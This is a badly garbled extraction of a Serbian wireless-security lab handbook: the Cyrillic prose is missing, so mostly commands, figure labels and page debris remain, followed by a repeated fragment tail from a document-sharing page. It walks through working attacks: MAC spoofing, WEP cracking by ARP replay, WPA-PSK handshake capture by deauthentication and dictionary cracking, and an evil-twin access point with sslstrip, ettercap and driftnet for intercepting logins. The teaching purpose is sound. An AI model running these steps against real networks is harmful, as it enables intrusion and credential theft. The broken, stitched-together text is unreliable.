Wireshark .
6.3
. 25.
(SSID) beacon ,
Probe .

, .
, SSID beacon ,
. ,
, ssocition
24 Intrusion Detection Software - IDS

25 Hidden, cloaked mode
95
VI
request SSID. SSID

, , .
Kismet,
SSID .
SSID-a
.
.
()
SSID .
, .
802.11w .
,
802.11-2007 . 802.11w
.
802.11w CCMP/AES .
4:
SSID eacon (
IV ).
SSID .
.
.
Wireshark mon0 .
MAC .
, robe request
.
SSID .
oja SSID ?
6.4 MAC

MAC .
MAC .
MAC 26 je /
. MAC ROM
. , RAM ,
RAM .
26 Media Access Control Address
96

MAC
RAM , .

. MAC
.
5:
(
IV ).
.
MAC
.
MAC :
ifconfig wlan0 down
:
ifconfig wlan0 hw ether <MAC >
:
ifconfig wlan0 up
:
iwconfig wlan0 essid <SSID >
wlan0 DHCP :
dhclient wlan0
.
?
Windows MAC
, NetworkAddress
( 6.3).
6.3 : MAC : 000011112222
97
98
VII
WEP
.
WEP
.
, .
VII
7. WEP
7.1
.
802.11,
WEP27. , WEP
.

.
IEEE 802.11 WEP
. WEP
,
.
7.2 WEP

. IEEE 802.11 W :
,
.

. ANY SSID
.

hot-spots.
7.1 :
7.1 :
1. .
27 Wired Equivalent Privacy -
100

2. .
3. .

WEP .
, 7.2:
1. .
2. 128-
.
3.
.
4. .
5. ,

.
, ,
.
7.2 :

. ,

.

.
7.3
WEP RC4
IV.
101
VII
XOR ( )
:
C = [ M || ICV(M) ] [ RC4(K || IV) ]
:
,
,
ICV(M) ,
,
,
IV - ,
|| - .
7.3 : WEP
WEP 7.3. eyID, 40- 104-

, .
, 24- (IV) 40- 104-
64-, 128-
. IV ,
.
, CRC28
. CRC-32
. CRC-32
.
RC4 CRC-32 ,
:
http://en.wikipedia.org/wiki/Rc4
http://en.wikipedia.org/wiki/Cyclic_redundancy_check
WEP- . RC4
,
.
28 Cyclic redundancy check
102

IV WEP-,
. , 24 , 224
. ,
IV ( ) 99%
12000 . 1 54Mb/s,
12000 .
, 7. 3, IV (
) WEP .
IV .
7.4 WEP
WEP IV
.
Windows WEP
:
1. (Control panel)
.
2. (Properties).
7.4 :
103
VII
3. ( 7.4)
(Add).
4. SSID, WEP (
7.5).
7.5 :
Linux WEP
:
1. .
2. iwconfig ( 7.6).
104

7.6 : iwconfig
3. o WEP
ESSID WEP .
:
iwconfig <> ESSID <essid> key < >

: iwconfig wlan0 ESSID lab403 key 33:BB:33:FF:11:11.
4. :
dhclient wlan0
7.5 WEP
WEP :
.
.
.
, , . IV-,
, , .

, , .
WEP Aircrack-ng .
aireplay-ng WEP
:
,
ARP ,
KoreK-chopchop ,
,
105
VII
Cafe-latte.
ARP

WEP .
aireplay-ng 29.
ARP

IV
.
. ARP ,
, . ARP
broadcast (FF:FF:FF:FF:FF:FF) 68 . ARP

ARP ,
IV.
:
airodump-ng WEP
,
;
aireplay-ng ARP
;
aircrack-ng IV WEP .
:
:
airodump-ng
WEP :
airodump-ng mon0
29 http://www.aircrack-ng.org/doku.php?id=aireplay-ng
106

7.7 : WEP
, :
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 w snimak mon0
:
-c 9 ,
--bssid 00:14:6C:7E:40:80 ,
w snimak .
aireplay-ng .
aireplay-ng ARP
. :
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
:
-3 ,
-b 00:14:6C:7E:40:80 - ,
-h 00:0F:B5:88:AC:82 - .
ARP
:
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955
packets...
, airodump-ng
, (
7.8).
107
VII
7.8 : airodump-ng
( 20,000 64-
40,000 128- ) airecrack-ng
WEP :
aircrack-ng -b 00:14:6C:7E:40:80 snimak*.cap
:
-b 00:14:6C:7E:40:80 - ,
snimak*.cap .
(7.9):
7.9 : aircrack-ng
1: 64- WEP
WEP .
64- : password WEP .
.
WEP .
.
108

2: 128- WEP
WEP .
128- : password WEP .
.
WEP .
.
109
110
VIII
WPA/WPA2
.
IEEE 802.11i
.
,
.
VIII
8. WPA/WPA2
8.1
WEP .
IEEE 2001.
.
IEEE 802.11i (WPA230). ,
Wi-Fi ,
, -
WEP . ,
IEEE .
WEP
. 2003. Wi-Fi WPA ,
2004. IEEE 802.11i , WPA2.
WPA WPA2 . WPA RC4
, WPA2 AES . WPA RC4
WEP. RC4
, WPA
WEP .
8.2 WPA/WPA2
WPA WPA2 WEP . WPA WPA2

:
SOHO
(PSK31) ,
RADIUS32
.
, PSK .
WPA-PSK WPA2-PSK
.
WPA-PSK WPA2-PSK
WEP , WPA/WPA2 .
PMK33 256 . WPA-PSK WPA2-PSK, PMK
(PSK) (
8 63 ACSII ).
30 Wi-Fi Protected Access

31 Pre-shared key
32 Remote Authentication Dial In User Service
33 Pairwise master key
112

8.1 WPA/WPA2. PMK

(PSK). PMK 4096
hash PSK SSID .
8.1 : WPA/WPA2
PMK,
(PTK34). ,
.
PTK :
PMK,
(A-nonce),
34
Pairwise transient key
113
VIII
(S-nonce),
MAC ,
MAC .
PTK
e .
MIC35
. MIC hash
.
PMK PTK ,
PTK hash .
PMK.
8.3 WPA-PSK WPA2-PSK
WPA-PSK WPA2-PSK
.
. -
hash PMK. ,
WPA WPA2
.
8.1 PMK (PSK) 4096
hash . 4096 hash
.
, .
8.1 PMK PSK,
SSID . PMK

PSK, SSID PMK .

WPA WPA2 . WPA WPA2
PMK . MIC
.

.
.
aircrack-ng PSK.
aircrack-ng A-nonce S-nonce MIC.
MIC MIC
, PSK .
35
Message Integrity Protocol
114

:
airodump-ng
WPA-PSK/WPA2-PSK ,
;
aireplay-ng
.
,
.
aircrack-ng
hash .
:
:
airodump-ng
WPA-PSK/WP2-PSK :
airodump-ng mon0
8.2 : WPA-PSK/WP2-PSK
:
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 w psk_snimak mon0
:
-c 9 ,
115
VIII
--bssid 00:14:6C:7E:40:80 ,
w psk_snimak .
aireplay-ng .
:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:88:AC:82 mon0
:
-0 ,
-a 00:14:6C:7E:40:80 - ,
-c 00:0F:B5:88:AC:82 - .
airodump-ng
( 8.3), airecrack-ng :
aircrack-ng -w /pentest/passwords/jtr/password.lst -b 00:14:6C:7E:40:80 psk_snimak*.cap
:
-b 00:14:6C:7E:40:80 - ,
psk_snimak*.cap .
-w /pentest/passwords/jtr/password.lst -.
8.3 :
8.4.
116

8.4 : aircrack-ng
1: WPA
WPA-PSK .
: password PMK .
.
WPA-PSK .
.
8.4 WPA-PSK/WPA2-PSK

WPA/WPA2
IV .
Windows WPA/WPA2
:
1. (Control panel)
.
2. (Properties).
117
VIII
8.5 :
5. ( 8.5)
(Add).
6. SSID, PSK (
8.6)
118

8.6 :
Linux WPA/WPA2
:
1. (. nano) wpa_supplicant.conf ,
:
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
eapol_version=1
ap_scan=1
fast_reauth=1
network={
ssid=" ESSID" >>
proto=WPA
key_mgmt=WPA-PSK
pairwise=TKIP
psk="" >>
}
2. WPA :
wpa_supplicant -i wlan0 -c wpa_supplicant.conf
119
IX
, .
Linux .
,
.
IX
9.
9.1
.
Linux .
9.1 :

( 9.1). .
9.2
:
1. DHCP ,
2. ,
3. .
DHCP /etc/dhcp3/dhcpd.conf.
dhcpd.conf .
.
mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.bkp
nano /etc/dhcp3/dhcpd.conf
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.1;
option domain-name-servers 8.8.8.8;
range 10.0.0.100 10.0.0.150;
}
mkdir p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
122

Airbase-ng
. .
irbase-ng ( at0),
.
airbase-ng -e BksAP -c 9 mon0

ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
DHCP
PID .
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid
at0

(at0) ( .
). iptables Linux .
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface eth0

-j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append PREROUTING p udp -dport 53 j
DNAT -to default_gateway_od_eth0
echo 1 > /proc/sys/net/ipv4/ip_forward
9.3

.
. CUDA
,
.

, 36.
36 Man-in-the-middle
123
IX

. 9.2.
9.2 :
. (Evil twin),
SSID- .
,
.
,
.
,
.

.
,

SSL .
(https )
Ettercap SSL .
, 76%
, Ettercap SSL

.
SSL .
:
Ettercap ;
Sslstrip HTTPS ;
Driftnet TCP ;
124

# http https Ettercap

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -
j REDIRECT --to-ports 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 443
-j REDIRECT --to-ports 10000
ettercap -T -q -p -i at0 // //
sslstrip -a -k f
driftnet -v -i at0
9.3
www.gmail.com .
9.3 :
1:
.
,
.
2:
,
.
125
126
X

.
RADIUS
.
127
X
10.
10.1
SOHO
(PSK) .
WPA-PSK WPA2-PSK .
, , . WPA-Enterprise
WPA2-Enterprise .
.

. ,
.
(
, LDAP, SQL .)
( ).
WPA-Enterprise WPA2--Enterprise
IEEE 802.1 EAP37. IEEE 802.1X
.
.
,
.
:
, .
(NAS38),
(
802.1x ).
,
.
.
.
, . ,

. 802.1X

.
.
802.1X SOHO .
RADIUS
37 Extensible Authentication Protocol

38 Network Access Server
128

,
.
EAP .

. ,
. RADIUS39
IP . WPA
RADIUS , (. DIAMETER,
TACAS+, .).
, EAP
, RADIUS .
( 10.1).
10.1 : 802.1X

, EAP :
EAP-PEAP40 - MSCHAPv241
. MSCHAPv2
39 Remote Authentication Dial In User Service

40 Protected EAP
129
X
NT hash . PEAP-
Windows
.
EAP-TTLS42- PAP43, CHAP44 MSCHAPv2
. Linux Apple
Mac , Windows
.
PKI45
(
)
.
.

(anonymous), , ,
,
. RADIUS ,
(
CA46) .
. ,
( )
( 10.2).
,
.
10.2 :
41 Microsoft Challenge Handshake Authentication Protocol version 2

42 EAP-Tunneled Transport Layer Security
43 Password authentication protocol
44 Challenge-Handshake Authentication Protocol
45 Public Key Infrastructure
46 Certificate Authority
130

10.2 WPA/WPA2-Enterprise
Windows Server 2008

, RADIUS . , ,
.
.
WPA/WPA2-Enterprise :
1. .
2. .
3. RADIUS .
4. .
5. .

.
.
.
. start
dcpromo.
.
Create new
domain in a new forest. Next.
131
X
10.3 :
. bkslab.edu.rs.
Next.
132

10.4 :
.
Password2 .
. , Finish .
. ,
Password3 .
.
(OU - rganiztion unit).
Start>Administrative Tools>Active Directry Users and Computers.
.
(bkslab.edu.rs) New-Ogranization Unit.
.
133
X
10.5 :
OU . Wireless
. OU , New-User.
10.6 :
, Logon name mristic. next

Password2. .
134

. OU , New-Group.
Wireless. .
. Add to group
Wireless.
10.7 :
PEAP .
()
.
.
(Initial Configuration Tasks)
Add roles47. Active Directory Certificate Services Next.
47 , Start > Server Manager > Roles
135
X
10.8 :
Enterprise
Next.
10.9 :
136

:
Root CA ,
(Create a new private key),
.
, (
10.10).
10.10 :
,

.
Install.

PEAP . Microsoft (): Start >
MM > Enter. MMC : File > Add/Remove Snap-in.
Certificates ( 10.11), Add.
137
X
10.11 : MMC
Computer account, Next ( 10.12).

Local computer, Finish, OK.
10.12 : MMC
Certificates (Local Computer Account)>Personal,

Certificates >All tasks>Request new certificates ( 10.13).
Domain Controller, Enroll.
Finish.
138

10.13 :
RADIUS
Windows Server RADIUS

IAS48 . Windows Server 2008 RADIUS
Network Policy and Access Services .
(Initial Configuration Tasks)
Add roles. Network Policy and Access Services Next (
10.14).
48 Internet Authenticate Service
139
X
10.14 : Network Policy and Access Services
( 10.15):
Network Policy Server,
Routing and Remote Access Servers,
Remote Access Services,
Routing.
140

10.15 :
RADIUS
. e Start > nps.ms > Enter.
RADIUS server for 802.1X Wireless or Wired Connections (
10.16).
141
X
10.16 : RADIUS
802.1X (Configure 802.1x). 802.1

Secure Wireless Connection Next.
RADIUS ( )
Add ( 10.17):
Friendly name: AP
IP Address: 192.168.1.1 (
)
Shared Secret: Password12345
RADIUS RADIUS
.
142

10.17 : RADIUS
Microsoft:
Protected EAP (PEAP),
Wireless.
NPS .

RSDIUS .
Wireless Security ( 10.18):
WPA/WPA2,
o Version: WPA2,
o Encryption: AES,
o IP RADIUS , RADIUS
(Password12345).
(SSID, ,
, ...).
143
X
10.18 :
CA
.
. MMC , Certificates (Local
Computer Account) > Personal, Certificates.
, All Tasks > Export ( 10.19).
144

10.19 :
a ,
DER.
.

( 10.20),
(Trusted Root Certificate
Authorities). .
WPA2-Enterprise .
145
X
10.20 :
. Windows 7

SSID . Properties.
(Security Windows Vista Windows 7, Advanced
Windows XP) WPA2-Enterprise ,
AES ( 10.21). Windows XP
Enable IEEE 802.1x authentication for this network.
146

10.21 :
Windows 7 (Advanced Settings)

(User Authentication)
(Specify authentication mode).
, Settings PEAP
. PEAP
( 10.22):
(Validate
server certificate),
(Connect to these servers),
,
Secured password (EAP-MSCHAP v2).
147
X
10.22 : PEAP
.
,
, :
Username: mristic
Password: Password2
1: WPA2-Enterprise
WPA2-Enterprise .
,
RADIUS . RADIUS .
148
XI
MikroTik RouterOS
MikroTik .

.
.
149
XI
11. MikroTik RouterOS

11.1 MikroTik RouterOS
RouterOS
. MikroTik Linux-.
Linux-, MikroTik .

SOHO .
.
.
, MikroTik x86 .

( ).
, x86 (
, , , ).
RouterBoard ( 11.1) . RouterBoard
MIPS (RISC)
.
x86
(L2PT VPN, IPSec VPN, 1Gbps..).

.
11.1 : MikroTik RouterBoard
MikroTik RouterOS x86

MikroTik .
.
11.2 MikroTik
MikroTik :
150

(SSH/Telnet),
Winbox ( , ),
Web stranice ( ).
CLI49 o ,
Winbox (.
DLL Winbox ).
Winbox ,
.
.
Winbox OSI
. IP
.
Winbox .

1 11.2.
192.168.88.1.
11.2 :
OSI
MAC . admin,
. Connect ( 2 11.2) .
49 Command line interface
151
XI
11.3 MikroTik

. 11.3 .
11.3 :
:
LAN 88.88.88.2/20,
BksMT,
- WPA2,
IP
192.168.50.0/24,
,
1Mbs.
IP IP>Addresses.
, Address List,
Address ( 11.4).
.
152

11.4 : IP

Address List (
)

.

- 192.168.50.1/24
( 11.5).
153
XI

11.5 :
IP

(W Wireless>Seccurity Profilles>Add - ).

11.6.
154

11.6 :

W WPA2-profil

.

.
Wirelesss>Interfacess ,
( wlaan1). 11.7
.
aap-bridge ,, .
155
XI
11..7 :
D DHCP
. DHCP
IP>DHCP P Server>D DHCP Setup.. wlan 1

DHCP . 192.168.50.0//24
, ( wlan1 -
192.168..50.1) .
192.168.50.2-1192.168.50.100. DNS
. 11.8 DHCP .
156

11.8 : DHCP

(NAT). 192.168.50.0/24
ether1 . NAT
IP>Firewall>NAT.
General ( 11.9):
chain: SRCNAT,
: 192.168.50.0./24
: 0.0.0.0/0 ( ),
: ether1.
Action NAT-a MASQUERADE.
.
157
XI
11.9 :
MikroTik .
1Mbs
.
MikroTik ,

.
.

1Mbs:
/queue simple add name="1M-korisnici" dst-
address=192.168.50.0/24 interface=ether1 direction=both
priority=8 queue=default/default limit-at=1000000/1000000 max-
limit=1000000/1000000 disabled=no
:
name - ,
dst-address - (
);
interface - . Ether1
. ,
;
direction - (
). MikroTik ;
158

priority - .
. ,
;
queue - ;
limit-at - . .
, / (upload/download);
max-limit - .
;
disable - .
1: MikroTik
MiktoTik .
159

[1] . , , , ,
2008.
[2] W. Stallings, Wireless Communications & Networks, Prentice Hall, 2004.
[3] J. Schiller, Mobile Communications, Addison-Wesley, 2003.
[4] W. Osterhage, Wireless Security, Science Publisher, Jersey, 2012.
[5] R. Bartz, CWTS: Certified Wireless Technology Specialist Official Study Guide, John Wiley&Sons,
Indianopolis, 2012.
[6] T. Wrightson, Wireless Network Security A Beginner's Guide, McGraw-Hill, New York, 2012.
[7] Angela Orebaugh, Gilbert Ramirez, Jay Beale, Joshua Wright, Wireshark & Ethereal Network
Protocol Analyzer Toolkit, Syngress, 2007.
[8] http://www.ve2dbe.com
[9] http://www.backtrack-linux.org
[10] http://www.aircrack-ng.org
[11] http://technet.microsoft.com
160

II
III
IV
VI
VII
VIII
IX
XI
161

Bks Prirucnik1 PDF

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Bks Prirucnik1 PDF

Uploaded by

Copyright:

Available Formats

, , ,

621.396 :004(075.8 )(076)

8LOS Line of Sight

Yagi Cisco AIR-ANT1949.

1.24 : ) Heliax )LMR400

TNC Neill Concelmann.

'N' ( N Neill, 'Navy'- )

SMA 60- . SMA

SMB - SubMiniature version B. .

15 Shuttle Radar Topography Mission

2.4 : Merge pictures

2.12 : Google Earth

Probe Request ( 3).

18 Robust Security Network

Probe Response ( 4).

19 Extensible Authentication Protocol

20 Small Ofiice Home Office

Wireless, Wireless Settings ( 4.7):

Wireless, Wireless Security.

4.10 : WPA/WPA2 Enterprise

Wireless Advanced ( 4.12).

BackTrack Live DVD/USB- BIOS-

RFMON (Radio Frequency Monitor)

Kismet IEEE 802.11 ,

NULL QoS Data + Contention Free Poll wlan.fc.type_subtype eq 46

5.11 IEEE 802.11

5.10 : IEEE 802.11

Frame Control 2 wlan.fc

Version 802.11 wlan.fc.version

notice, frame, authenticate request,

DS status To DS From DS wlan.fcds

More Fragments wlan.fc.flag

Address , wlan.da (destination),

Fragment Number wlan.frag

Sequence Number wlan.seq

5.4 : IEEE 802.11

6.2 DoS (denial-of-service)

24 Intrusion Detection Software - IDS

request SSID. SSID

26 Media Access Control Address

6.3 : MAC : 000011112222

27 Wired Equivalent Privacy -

WEP 7.3. eyID, 40- 104-

28 Cyclic redundancy check

iwconfig <> ESSID <essid> key < >

WPA WPA2 WEP . WPA WPA2

30 Wi-Fi Protected Access

8.1 WPA/WPA2. PMK

8.3 WPA-PSK WPA2-PSK

airbase-ng -e BksAP -c 9 mon0

iptables --table nat --append POSTROUTING --out-interface eth0

# http https Ettercap

37 Extensible Authentication Protocol

39 Remote Authentication Dial In User Service

41 Microsoft Challenge Handshake Authentication Protocol version 2

Windows Server 2008

, Logon name mristic. next

47 , Start > Server Manager > Roles

Computer account, Next ( 10.12).

Certificates (Local Computer Account)>Personal,

Windows Server RADIUS

48 Internet Authenticate Service

10.14 : Network Policy and Access Services